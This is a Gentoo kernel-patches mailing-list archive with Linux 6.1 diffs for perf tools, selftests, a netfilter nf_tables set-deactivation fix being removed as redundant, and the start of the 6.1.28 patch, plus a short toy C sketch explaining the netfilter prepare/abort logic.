++++ b/tools/perf/builtin-record.c
+@@ -1864,7 +1864,7 @@ static void __record__read_lost_samples(struct record *rec, struct evsel *evsel,
+ 	int id_hdr_size;
+ 
+ 	if (perf_evsel__read(&evsel->core, cpu_idx, thread_idx, &count) < 0) {
+-		pr_err("read LOST count failed\n");
++		pr_debug("read LOST count failed\n");
+ 		return;
+ 	}
+ 
+diff --git a/tools/perf/builtin-stat.c b/tools/perf/builtin-stat.c
+index f6427e3a47421..a2c74a34e4a44 100644
+--- a/tools/perf/builtin-stat.c
++++ b/tools/perf/builtin-stat.c
+@@ -765,7 +765,7 @@ static int __run_perf_stat(int argc, const char **argv, int run_idx)
+ 		counter->reset_group = false;
+ 		if (bpf_counter__load(counter, &target))
+ 			return -1;
+-		if (!evsel__is_bpf(counter))
++		if (!(evsel__is_bperf(counter)))
+ 			all_counters_use_bpf = false;
+ 	}
+ 
+@@ -781,7 +781,7 @@ static int __run_perf_stat(int argc, const char **argv, int run_idx)
+ 
+ 		if (counter->reset_group || counter->errored)
+ 			continue;
+-		if (evsel__is_bpf(counter))
++		if (evsel__is_bperf(counter))
+ 			continue;
+ try_again:
+ 		if (create_perf_stat_counter(counter, &stat_config, &target,
+diff --git a/tools/perf/pmu-events/arch/powerpc/power9/other.json b/tools/perf/pmu-events/arch/powerpc/power9/other.json
+index 3f69422c21f99..f10bd554521a0 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power9/other.json
++++ b/tools/perf/pmu-events/arch/powerpc/power9/other.json
+@@ -1417,7 +1417,7 @@
+   {
+     "EventCode": "0x45054",
+     "EventName": "PM_FMA_CMPL",
+-    "BriefDescription": "two flops operation completed (fmadd, fnmadd, fmsub, fnmsub) Scalar instructions only. "
++    "BriefDescription": "two flops operation completed (fmadd, fnmadd, fmsub, fnmsub) Scalar instructions only."
+   },
+   {
+     "EventCode": "0x201E8",
+@@ -2017,7 +2017,7 @@
+   {
+     "EventCode": "0xC0BC",
+     "EventName": "PM_LSU_FLUSH_OTHER",
+-    "BriefDescription": "Other LSU flushes including: Sync (sync ack from L2 caused search of LRQ for oldest snooped load, This will either signal a Precise Flush of the oldest snooped loa or a Flush Next PPC); Data Valid Flush Next (several cases of this, one example is store and reload are lined up such that a store-hit-reload scenario exists and the CDF has already launched and has gotten bad/stale data); Bad Data Valid Flush Next (might be a few cases of this, one example is a larxa (D$ hit) return data and dval but can't allocate to LMQ (LMQ full or other reason). Already gave dval but can't watch it for snoop_hit_larx. Need to take the “bad dval” back and flush all younger ops)"
++    "BriefDescription": "Other LSU flushes including: Sync (sync ack from L2 caused search of LRQ for oldest snooped load, This will either signal a Precise Flush of the oldest snooped loa or a Flush Next PPC); Data Valid Flush Next (several cases of this, one example is store and reload are lined up such that a store-hit-reload scenario exists and the CDF has already launched and has gotten bad/stale data); Bad Data Valid Flush Next (might be a few cases of this, one example is a larxa (D$ hit) return data and dval but can't allocate to LMQ (LMQ full or other reason). Already gave dval but can't watch it for snoop_hit_larx. Need to take the 'bad dval' back and flush all younger ops)"
+   },
+   {
+     "EventCode": "0x5094",
+diff --git a/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json b/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json
+index d0265f255de2b..723bffa41c448 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json
++++ b/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json
+@@ -442,7 +442,7 @@
+   {
+     "EventCode": "0x4D052",
+     "EventName": "PM_2FLOP_CMPL",
+-    "BriefDescription": "DP vector version of fmul, fsub, fcmp, fsel, fabs, fnabs, fres ,fsqrte, fneg "
++    "BriefDescription": "DP vector version of fmul, fsub, fcmp, fsel, fabs, fnabs, fres ,fsqrte, fneg"
+   },
+   {
+     "EventCode": "0x1F142",
+diff --git a/tools/perf/pmu-events/arch/s390/cf_z16/extended.json b/tools/perf/pmu-events/arch/s390/cf_z16/extended.json
+index c306190fc06f2..c2b10ec1c6e01 100644
+--- a/tools/perf/pmu-events/arch/s390/cf_z16/extended.json
++++ b/tools/perf/pmu-events/arch/s390/cf_z16/extended.json
+@@ -95,28 +95,28 @@
+ 		"EventCode": "145",
+ 		"EventName": "DCW_REQ",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+ 		"EventCode": "146",
+ 		"EventName": "DCW_REQ_IV",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache with Intervention",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache with intervention."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache with intervention."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+ 		"EventCode": "147",
+ 		"EventName": "DCW_REQ_CHIP_HIT",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache with Chip HP Hit",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache after using chip level horizontal persistence, Chip-HP hit."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache after using chip level horizontal persistence, Chip-HP hit."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+ 		"EventCode": "148",
+ 		"EventName": "DCW_REQ_DRAWER_HIT",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache with Drawer HP Hit",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache after using drawer level horizontal persistence, Drawer-HP hit."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache after using drawer level horizontal persistence, Drawer-HP hit."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+@@ -284,7 +284,7 @@
+ 		"EventCode": "172",
+ 		"EventName": "ICW_REQ_DRAWER_HIT",
+ 		"BriefDescription": "Directory Write Level 1 Instruction Cache from Cache with Drawer HP Hit",
+-		"PublicDescription": "A directory write to the Level-1 Instruction cache directory where the returned cache line was sourced from the requestor’s Level-2 cache using drawer level horizontal persistence, Drawer-HP hit."
++		"PublicDescription": "A directory write to the Level-1 Instruction cache directory where the returned cache line was sourced from the requestors Level-2 cache using drawer level horizontal persistence, Drawer-HP hit."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+diff --git a/tools/perf/scripts/python/intel-pt-events.py b/tools/perf/scripts/python/intel-pt-events.py
+index 6be7fd8fd6158..8058b2fc2b686 100644
+--- a/tools/perf/scripts/python/intel-pt-events.py
++++ b/tools/perf/scripts/python/intel-pt-events.py
+@@ -11,7 +11,7 @@
+ # FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for
+ # more details.
+ 
+-from __future__ import print_function
++from __future__ import division, print_function
+ 
+ import os
+ import sys
+diff --git a/tools/perf/tests/shell/record_offcpu.sh b/tools/perf/tests/shell/record_offcpu.sh
+index d2eba583a2ac9..054272750aa9c 100755
+--- a/tools/perf/tests/shell/record_offcpu.sh
++++ b/tools/perf/tests/shell/record_offcpu.sh
+@@ -65,7 +65,7 @@ test_offcpu_child() {
+ 
+   # perf bench sched messaging creates 400 processes
+   if ! perf record --off-cpu -e dummy -o ${perfdata} -- \
+-    perf bench sched messaging -g 10 > /dev/null 2&>1
++    perf bench sched messaging -g 10 > /dev/null 2>&1
+   then
+     echo "Child task off-cpu test [Failed record]"
+     err=1
+diff --git a/tools/perf/util/cs-etm.c b/tools/perf/util/cs-etm.c
+index 16db965ac995e..09e240e4477d0 100644
+--- a/tools/perf/util/cs-etm.c
++++ b/tools/perf/util/cs-etm.c
+@@ -2488,26 +2488,29 @@ static int cs_etm__process_auxtrace_event(struct perf_session *session,
+ 	return 0;
+ }
+ 
+-static bool cs_etm__is_timeless_decoding(struct cs_etm_auxtrace *etm)
++static int cs_etm__setup_timeless_decoding(struct cs_etm_auxtrace *etm)
+ {
+ 	struct evsel *evsel;
+ 	struct evlist *evlist = etm->session->evlist;
+-	bool timeless_decoding = true;
+ 
+ 	/* Override timeless mode with user input from --itrace=Z */
+-	if (etm->synth_opts.timeless_decoding)
+-		return true;
++	if (etm->synth_opts.timeless_decoding) {
++		etm->timeless_decoding = true;
++		return 0;
++	}
+ 
+ 	/*
+-	 * Circle through the list of event and complain if we find one
+-	 * with the time bit set.
++	 * Find the cs_etm evsel and look at what its timestamp setting was
+ 	 */
+-	evlist__for_each_entry(evlist, evsel) {
+-		if ((evsel->core.attr.sample_type & PERF_SAMPLE_TIME))
+-			timeless_decoding = false;
+-	}
++	evlist__for_each_entry(evlist, evsel)
++		if (cs_etm__evsel_is_auxtrace(etm->session, evsel)) {
++			etm->timeless_decoding =
++				!(evsel->core.attr.config & BIT(ETM_OPT_TS));
++			return 0;
++		}
+ 
+-	return timeless_decoding;
++	pr_err("CS ETM: Couldn't find ETM evsel\n");
++	return -EINVAL;
+ }
+ 
+ static const char * const cs_etm_global_header_fmts[] = {
+@@ -3051,7 +3054,6 @@ int cs_etm__process_auxtrace_info(union perf_event *event,
+ 	etm->snapshot_mode = (hdr[CS_ETM_SNAPSHOT] != 0);
+ 	etm->metadata = metadata;
+ 	etm->auxtrace_type = auxtrace_info->type;
+-	etm->timeless_decoding = cs_etm__is_timeless_decoding(etm);
+ 
+ 	etm->auxtrace.process_event = cs_etm__process_event;
+ 	etm->auxtrace.process_auxtrace_event = cs_etm__process_auxtrace_event;
+@@ -3061,6 +3063,10 @@ int cs_etm__process_auxtrace_info(union perf_event *event,
+ 	etm->auxtrace.evsel_is_auxtrace = cs_etm__evsel_is_auxtrace;
+ 	session->auxtrace = &etm->auxtrace;
+ 
++	err = cs_etm__setup_timeless_decoding(etm);
++	if (err)
++		return err;
++
+ 	etm->unknown_thread = thread__new(999999999, 999999999);
+ 	if (!etm->unknown_thread) {
+ 		err = -ENOMEM;
+diff --git a/tools/perf/util/evsel.h b/tools/perf/util/evsel.h
+index 989865e16aadd..8ce30329a0772 100644
+--- a/tools/perf/util/evsel.h
++++ b/tools/perf/util/evsel.h
+@@ -263,6 +263,11 @@ static inline bool evsel__is_bpf(struct evsel *evsel)
+ 	return evsel->bpf_counter_ops != NULL;
+ }
+ 
++static inline bool evsel__is_bperf(struct evsel *evsel)
++{
++	return evsel->bpf_counter_ops != NULL && list_empty(&evsel->bpf_counter_list);
++}
++
+ #define EVSEL__MAX_ALIASES 8
+ 
+ extern const char *const evsel__hw_cache[PERF_COUNT_HW_CACHE_MAX][EVSEL__MAX_ALIASES];
+diff --git a/tools/perf/util/pmu.c b/tools/perf/util/pmu.c
+index 03284059175f7..9a762c0cc53ce 100644
+--- a/tools/perf/util/pmu.c
++++ b/tools/perf/util/pmu.c
+@@ -1845,7 +1845,7 @@ static int perf_pmu__new_caps(struct list_head *list, char *name, char *value)
+ 	return 0;
+ 
+ free_name:
+-	zfree(caps->name);
++	zfree(&caps->name);
+ free_caps:
+ 	free(caps);
+ 
+diff --git a/tools/perf/util/sort.c b/tools/perf/util/sort.c
+index 2e7330867e2ef..6882b17144994 100644
+--- a/tools/perf/util/sort.c
++++ b/tools/perf/util/sort.c
+@@ -876,8 +876,7 @@ static int hist_entry__dso_to_filter(struct hist_entry *he, int type,
+ static int64_t
+ sort__sym_from_cmp(struct hist_entry *left, struct hist_entry *right)
+ {
+-	struct addr_map_symbol *from_l = &left->branch_info->from;
+-	struct addr_map_symbol *from_r = &right->branch_info->from;
++	struct addr_map_symbol *from_l, *from_r;
+ 
+ 	if (!left->branch_info || !right->branch_info)
+ 		return cmp_null(left->branch_info, right->branch_info);
+diff --git a/tools/perf/util/symbol-elf.c b/tools/perf/util/symbol-elf.c
+index 80345695b1360..29c9348c30f00 100644
+--- a/tools/perf/util/symbol-elf.c
++++ b/tools/perf/util/symbol-elf.c
+@@ -553,7 +553,7 @@ static int elf_read_build_id(Elf *elf, void *bf, size_t size)
+ 				size_t sz = min(size, descsz);
+ 				memcpy(bf, ptr, sz);
+ 				memset(bf + sz, 0, size - sz);
+-				err = descsz;
++				err = sz;
+ 				break;
+ 			}
+ 		}
+diff --git a/tools/perf/util/tracepoint.c b/tools/perf/util/tracepoint.c
+index 89ef56c433110..92dd8b455b902 100644
+--- a/tools/perf/util/tracepoint.c
++++ b/tools/perf/util/tracepoint.c
+@@ -50,6 +50,7 @@ int is_valid_tracepoint(const char *event_string)
+ 				 sys_dirent->d_name, evt_dirent->d_name);
+ 			if (!strcmp(evt_path, event_string)) {
+ 				closedir(evt_dir);
++				put_events_file(dir_path);
+ 				closedir(sys_dir);
+ 				return 1;
+ 			}
+diff --git a/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh b/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh
+index aebaab8ce44cb..441eededa0312 100755
+--- a/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh
++++ b/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh
+@@ -292,6 +292,11 @@ setup_hs()
+ 	ip netns exec ${hsname} sysctl -wq net.ipv6.conf.all.accept_dad=0
+ 	ip netns exec ${hsname} sysctl -wq net.ipv6.conf.default.accept_dad=0
+ 
++	# disable the rp_filter otherwise the kernel gets confused about how
++	# to route decap ipv4 packets.
++	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.all.rp_filter=0
++	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.default.rp_filter=0
++
+ 	ip -netns ${hsname} link add veth0 type veth peer name ${rtveth}
+ 	ip -netns ${hsname} link set ${rtveth} netns ${rtname}
+ 	ip -netns ${hsname} addr add ${IPv6_HS_NETWORK}::${hs}/64 dev veth0 nodad
+@@ -316,11 +321,6 @@ setup_hs()
+ 	ip netns exec ${rtname} sysctl -wq net.ipv6.conf.${rtveth}.proxy_ndp=1
+ 	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.${rtveth}.proxy_arp=1
+ 
+-	# disable the rp_filter otherwise the kernel gets confused about how
+-	# to route decap ipv4 packets.
+-	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.all.rp_filter=0
+-	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.${rtveth}.rp_filter=0
+-
+ 	ip netns exec ${rtname} sh -c "echo 1 > /proc/sys/net/vrf/strict_mode"
+ }
+ 
+diff --git a/tools/testing/selftests/netfilter/Makefile b/tools/testing/selftests/netfilter/Makefile
+index 4504ee07be08d..3686bfa6c58d7 100644
+--- a/tools/testing/selftests/netfilter/Makefile
++++ b/tools/testing/selftests/netfilter/Makefile
+@@ -8,8 +8,11 @@ TEST_PROGS := nft_trans_stress.sh nft_fib.sh nft_nat.sh bridge_brouter.sh \
+ 	ipip-conntrack-mtu.sh conntrack_tcp_unreplied.sh \
+ 	conntrack_vrf.sh nft_synproxy.sh rpath.sh
+ 
+-CFLAGS += $(shell pkg-config --cflags libmnl 2>/dev/null || echo "-I/usr/include/libmnl")
+-LDLIBS = -lmnl
++HOSTPKG_CONFIG := pkg-config
++
++CFLAGS += $(shell $(HOSTPKG_CONFIG) --cflags libmnl 2>/dev/null)
++LDLIBS += $(shell $(HOSTPKG_CONFIG) --libs libmnl 2>/dev/null || echo -lmnl)
++
+ TEST_GEN_FILES =  nf-queue connect_close
+ 
+ include ../lib.mk


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-05-11 16:08 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-05-11 16:08 UTC (permalink / raw
  To: gentoo-commits

commit:     ca9160a5400fac4d1f0c0fb82f42c9c481e63aa3
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu May 11 16:07:47 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu May 11 16:07:47 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ca9160a5

Remove redundant patch

Removed:
1520_nf-tables-make-deleted-anon-sets-inactive.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |   4 -
 ...nf-tables-make-deleted-anon-sets-inactive.patch | 121 ---------------------
 2 files changed, 125 deletions(-)

diff --git a/0000_README b/0000_README
index c442268b..dd54d67d 100644
--- a/0000_README
+++ b/0000_README
@@ -163,10 +163,6 @@ Patch:  1510_fs-enable-link-security-restrictions-by-default.patch
 From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch/
 Desc:   Enable link security restrictions by default.
 
-Patch:  1520_fs-enable-link-security-restrictions-by-default.patch
-From:   https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/?id=c1592a89942e9678f7d9c8030efa777c0d57edab
-Desc:   netfilter: nf_tables: deactivate anonymous set from preparation phase
-
 Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 

diff --git a/1520_nf-tables-make-deleted-anon-sets-inactive.patch b/1520_nf-tables-make-deleted-anon-sets-inactive.patch
deleted file mode 100644
index cd75de5c..00000000
--- a/1520_nf-tables-make-deleted-anon-sets-inactive.patch
+++ /dev/null
@@ -1,121 +0,0 @@
-From c1592a89942e9678f7d9c8030efa777c0d57edab Mon Sep 17 00:00:00 2001
-From: Pablo Neira Ayuso <pablo@netfilter.org>
-Date: Tue, 2 May 2023 10:25:24 +0200
-Subject: netfilter: nf_tables: deactivate anonymous set from preparation phase
-
-Toggle deleted anonymous sets as inactive in the next generation, so
-users cannot perform any update on it. Clear the generation bitmask
-in case the transaction is aborted.
-
-The following KASAN splat shows a set element deletion for a bound
-anonymous set that has been already removed in the same transaction.
-
-[   64.921510] ==================================================================
-[   64.923123] BUG: KASAN: wild-memory-access in nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.924745] Write of size 8 at addr dead000000000122 by task test/890
-[   64.927903] CPU: 3 PID: 890 Comm: test Not tainted 6.3.0+ #253
-[   64.931120] Call Trace:
-[   64.932699]  <TASK>
-[   64.934292]  dump_stack_lvl+0x33/0x50
-[   64.935908]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.937551]  kasan_report+0xda/0x120
-[   64.939186]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.940814]  nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.942452]  ? __kasan_slab_alloc+0x2d/0x60
-[   64.944070]  ? nf_tables_setelem_notify+0x190/0x190 [nf_tables]
-[   64.945710]  ? kasan_set_track+0x21/0x30
-[   64.947323]  nfnetlink_rcv_batch+0x709/0xd90 [nfnetlink]
-[   64.948898]  ? nfnetlink_rcv_msg+0x480/0x480 [nfnetlink]
-
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
----
- include/net/netfilter/nf_tables.h |  1 +
- net/netfilter/nf_tables_api.c     | 12 ++++++++++++
- net/netfilter/nft_dynset.c        |  2 +-
- net/netfilter/nft_lookup.c        |  2 +-
- net/netfilter/nft_objref.c        |  2 +-
- 5 files changed, 16 insertions(+), 3 deletions(-)
-
-diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
-index 3ed21d2d56590..2e24ea1d744c2 100644
---- a/include/net/netfilter/nf_tables.h
-+++ b/include/net/netfilter/nf_tables.h
-@@ -619,6 +619,7 @@ struct nft_set_binding {
- };
- 
- enum nft_trans_phase;
-+void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set);
- void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
- 			      struct nft_set_binding *binding,
- 			      enum nft_trans_phase phase);
-diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
-index 8b6c61a2196cb..59fb8320ab4d7 100644
---- a/net/netfilter/nf_tables_api.c
-+++ b/net/netfilter/nf_tables_api.c
-@@ -5127,12 +5127,24 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
- 	}
- }
- 
-+void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
-+{
-+	if (nft_set_is_anonymous(set))
-+		nft_clear(ctx->net, set);
-+
-+	set->use++;
-+}
-+EXPORT_SYMBOL_GPL(nf_tables_activate_set);
-+
- void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
- 			      struct nft_set_binding *binding,
- 			      enum nft_trans_phase phase)
- {
- 	switch (phase) {
- 	case NFT_TRANS_PREPARE:
-+		if (nft_set_is_anonymous(set))
-+			nft_deactivate_next(ctx->net, set);
-+
- 		set->use--;
- 		return;
- 	case NFT_TRANS_ABORT:
-diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
-index 274579b1696e0..bd19c7aec92ee 100644
---- a/net/netfilter/nft_dynset.c
-+++ b/net/netfilter/nft_dynset.c
-@@ -342,7 +342,7 @@ static void nft_dynset_activate(const struct nft_ctx *ctx,
- {
- 	struct nft_dynset *priv = nft_expr_priv(expr);
- 
--	priv->set->use++;
-+	nf_tables_activate_set(ctx, priv->set);
- }
- 
- static void nft_dynset_destroy(const struct nft_ctx *ctx,
-diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
-index cecf8ab90e58f..03ef4fdaa460b 100644
---- a/net/netfilter/nft_lookup.c
-+++ b/net/netfilter/nft_lookup.c
-@@ -167,7 +167,7 @@ static void nft_lookup_activate(const struct nft_ctx *ctx,
- {
- 	struct nft_lookup *priv = nft_expr_priv(expr);
- 
--	priv->set->use++;
-+	nf_tables_activate_set(ctx, priv->set);
- }
- 
- static void nft_lookup_destroy(const struct nft_ctx *ctx,
-diff --git a/net/netfilter/nft_objref.c b/net/netfilter/nft_objref.c
-index cb37169608bab..a48dd5b5d45b1 100644
---- a/net/netfilter/nft_objref.c
-+++ b/net/netfilter/nft_objref.c
-@@ -185,7 +185,7 @@ static void nft_objref_map_activate(const struct nft_ctx *ctx,
- {
- 	struct nft_objref_map *priv = nft_expr_priv(expr);
- 
--	priv->set->use++;
-+	nf_tables_activate_set(ctx, priv->set);
- }
- 
- static void nft_objref_map_destroy(const struct nft_ctx *ctx,
--- 
-cgit 
-
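
The removed hunks above pair nf_tables_activate_set() with nf_tables_deactivate_set(): deleting a bound anonymous set during NFT_TRANS_PREPARE clears its visibility in the next generation, and an aborted transaction restores it. A minimal userspace sketch of that two-generation scheme — every name and the genmask encoding here are illustrative stand-ins, not the kernel's nft_* symbols:

/* Toy model of the prepare/abort handling described in the commit
 * message above.  In the real kernel the state lives in struct
 * nft_set and the helpers sit in net/netfilter/nf_tables_api.c;
 * nothing below is kernel code. */
#include <assert.h>
#include <stdbool.h>
#include <stdio.h>

struct toy_set {
	bool anonymous;
	unsigned int use;	/* expressions referencing the set */
	unsigned int genmask;	/* bit 0: current gen, bit 1: next gen */
};

#define GEN_CUR		0x1u
#define GEN_NEXT	0x2u

/* Prepare phase: hide an anonymous set from the next generation so no
 * later update in the same transaction can operate on it. */
static void toy_deactivate_set(struct toy_set *set)
{
	if (set->anonymous)
		set->genmask &= ~GEN_NEXT;
	set->use--;
}

/* Abort path: the transaction is rolled back, so the set must become
 * visible again in the next generation. */
static void toy_activate_set(struct toy_set *set)
{
	if (set->anonymous)
		set->genmask |= GEN_NEXT;
	set->use++;
}

int main(void)
{
	struct toy_set set = {
		.anonymous = true,
		.use = 1,
		.genmask = GEN_CUR | GEN_NEXT,
	};

	/* Delete the bound anonymous set while preparing the transaction:
	 * later updates no longer see it in the next generation. */
	toy_deactivate_set(&set);
	assert(!(set.genmask & GEN_NEXT));

	/* Abort: visibility and the use count are both restored. */
	toy_activate_set(&set);
	assert(set.genmask & GEN_NEXT);
	assert(set.use == 1);

	printf("use=%u genmask=0x%x\n", set.use, set.genmask);
	return 0;
}

The current-generation state is deliberately left alone in both helpers, which keeps the abort path to a single bit flip plus the use-count increment — the "clear the generation bitmask in case the transaction is aborted" behaviour the commit message describes.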


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-05-11 14:49 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-05-11 14:49 UTC (permalink / raw
  To: gentoo-commits

commit:     dcba6756d2c93a2d48af31c1a0e3c7516dde24ec
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu May 11 14:49:23 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu May 11 14:49:23 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=dcba6756

Linux patch 6.1.28

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1027_linux-6.1.28.patch | 34891 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 34895 insertions(+)

diff --git a/0000_README b/0000_README
index 1f28562c..c442268b 100644
--- a/0000_README
+++ b/0000_README
@@ -151,6 +151,10 @@ Patch:  1026_linux-6.1.27.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.27
 
+Patch:  1027_linux-6.1.28.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.28
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1027_linux-6.1.28.patch b/1027_linux-6.1.28.patch
new file mode 100644
index 00000000..ad9f421d
--- /dev/null
+++ b/1027_linux-6.1.28.patch
@@ -0,0 +1,34891 @@
+diff --git a/Documentation/block/inline-encryption.rst b/Documentation/block/inline-encryption.rst
+index 4d151fbe20583..f9bf18ea65093 100644
+--- a/Documentation/block/inline-encryption.rst
++++ b/Documentation/block/inline-encryption.rst
+@@ -142,7 +142,7 @@ Therefore, we also introduce *blk-crypto-fallback*, which is an implementation
+ of inline encryption using the kernel crypto API.  blk-crypto-fallback is built
+ into the block layer, so it works on any block device without any special setup.
+ Essentially, when a bio with an encryption context is submitted to a
+-request_queue that doesn't support that encryption context, the block layer will
++block_device that doesn't support that encryption context, the block layer will
+ handle en/decryption of the bio using blk-crypto-fallback.
+ 
+ For encryption, the data cannot be encrypted in-place, as callers usually rely
+@@ -187,7 +187,7 @@ API presented to users of the block layer
+ 
+ ``blk_crypto_config_supported()`` allows users to check ahead of time whether
+ inline encryption with particular crypto settings will work on a particular
+-request_queue -- either via hardware or via blk-crypto-fallback.  This function
++block_device -- either via hardware or via blk-crypto-fallback.  This function
+ takes in a ``struct blk_crypto_config`` which is like blk_crypto_key, but omits
+ the actual bytes of the key and instead just contains the algorithm, data unit
+ size, etc.  This function can be useful if blk-crypto-fallback is disabled.
+@@ -195,7 +195,7 @@ size, etc.  This function can be useful if blk-crypto-fallback is disabled.
+ ``blk_crypto_init_key()`` allows users to initialize a blk_crypto_key.
+ 
+ Users must call ``blk_crypto_start_using_key()`` before actually starting to use
+-a blk_crypto_key on a request_queue (even if ``blk_crypto_config_supported()``
++a blk_crypto_key on a block_device (even if ``blk_crypto_config_supported()``
+ was called earlier).  This is needed to initialize blk-crypto-fallback if it
+ will be needed.  This must not be called from the data path, as this may have to
+ allocate resources, which may deadlock in that case.
+@@ -207,7 +207,7 @@ for en/decryption.  Users don't need to worry about freeing the bio_crypt_ctx
+ later, as that happens automatically when the bio is freed or reset.
+ 
+ Finally, when done using inline encryption with a blk_crypto_key on a
+-request_queue, users must call ``blk_crypto_evict_key()``.  This ensures that
++block_device, users must call ``blk_crypto_evict_key()``.  This ensures that
+ the key is evicted from all keyslots it may be programmed into and unlinked from
+ any kernel data structures it may be linked into.
+ 
+@@ -221,9 +221,9 @@ as follows:
+ 5. ``blk_crypto_evict_key()`` (after all I/O has completed)
+ 6. Zeroize the blk_crypto_key (this has no dedicated function)
+ 
+-If a blk_crypto_key is being used on multiple request_queues, then
++If a blk_crypto_key is being used on multiple block_devices, then
+ ``blk_crypto_config_supported()`` (if used), ``blk_crypto_start_using_key()``,
+-and ``blk_crypto_evict_key()`` must be called on each request_queue.
++and ``blk_crypto_evict_key()`` must be called on each block_device.
+ 
+ API presented to device drivers
+ ===============================
+diff --git a/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml b/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml
+index 1de11e7f33bbc..c8d803097d81d 100644
+--- a/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml
++++ b/Documentation/devicetree/bindings/sound/qcom,lpass-rx-macro.yaml
+@@ -27,6 +27,7 @@ properties:
+     const: 0
+ 
+   clocks:
++    minItems: 3
+     maxItems: 5
+ 
+   clock-names:
+diff --git a/Makefile b/Makefile
+index a5cfcd0a85a9e..2d221b879c48f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,9 +1,9 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 27
++SUBLEVEL = 28
+ EXTRAVERSION =
+-NAME = Hurr durr I'ma ninja sloth
++NAME = Curry Ramen
+ 
+ # *DOCUMENTATION*
+ # To see a list of typical targets execute "make help"
+diff --git a/arch/arm/boot/dts/omap3-gta04.dtsi b/arch/arm/boot/dts/omap3-gta04.dtsi
+index 28a6a9345be52..2dbee248a126f 100644
+--- a/arch/arm/boot/dts/omap3-gta04.dtsi
++++ b/arch/arm/boot/dts/omap3-gta04.dtsi
+@@ -612,6 +612,22 @@
